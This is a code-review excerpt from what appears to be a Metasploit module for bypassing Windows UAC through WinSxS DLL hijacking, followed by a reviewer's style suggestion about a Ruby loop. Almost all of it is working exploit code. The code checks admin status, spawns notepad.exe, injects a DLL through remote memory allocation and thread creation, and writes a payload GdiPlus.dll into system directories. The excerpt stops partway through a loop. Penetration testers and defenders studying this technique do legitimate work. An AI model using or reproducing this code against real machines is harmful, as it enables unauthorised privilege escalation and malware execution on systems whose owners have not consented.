modules/exploits/windows/local/bypassuac_injection_winsxs.rb

```diff
@@ -0,0 +1,389 @@
+    # Check if you are an admin
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+
+  def run_injection(pid, dll_path, file_paths)
+    vprint_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
+    begin
+      path_struct = create_struct(file_paths)
+
+      vprint_status("Opening process #{pid}")
+      host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+      exploit_mem, offset = inject_dll_into_process(host_process, dll_path)
+
+      vprint_status("Injecting struct into #{pid}")
+      struct_addr = host_process.memory.allocate(path_struct.length)
+      host_process.memory.write(struct_addr, path_struct)
+
+      vprint_status('Executing payload')
+      thread = host_process.thread.create(exploit_mem + offset, struct_addr)
+      print_good("Successfully injected payload in to process: #{pid}")
+      client.railgun.kernel32.WaitForSingleObject(thread.handle, 14000)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      print_error("Failed to Inject Payload to #{pid}!")
+      vprint_error(e.to_s)
+    end
+  end
+
+  # Create a process in the native architecture
+  def spawn_inject_proc(win_dir)
+    print_status('Spawning process with Windows Publisher Certificate, to inject into...')
+    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
+      cmd = "#{win_dir}\\sysnative\\notepad.exe"
+    else
+      cmd = "#{win_dir}\\System32\\notepad.exe"
+    end
+    pid = cmd_exec_get_pid(cmd)
+
+    unless pid
+      fail_with(Failure::Unknown, 'Spawning Process failed...')
+    end
+
+    pid
+  end
+
+  # Upload only one DLL, the rest will be copied into the specific folders
+  def upload_payload_dll(payload_filepath, directoryNames)
+    dllPath = "#{directoryNames[0]}\\GdiPlus.dll"
+    payload = generate_payload_dccw_gdiplus_dll({:dll_exitprocess => true})
+    print_status('Uploading the Payload DLL to the filesystem...')
+    begin
+      vprint_status("Payload DLL #{payload.length} bytes long being uploaded..")
+      write_file(dllPath, payload)
+    rescue Rex::Post::Meterpreter::RequestError => e
+      fail_with(Failure::Unknown, "Error uploading file #{directoryNames[0]}: #{e.class} #{e}")
+    end
+
+    if directoryNames.size > 1
+      copy_payload_dll(directoryNames, dllPath)
+    end
+  end
+
+  def copy_payload_dll(directoryNames, dllPath)
+    for i in 1 .. directoryNames.size - 1
```

Comment:
can be replaced with (directoryNames.size - 1).times do |i| and will look cleaner and be more Ruby style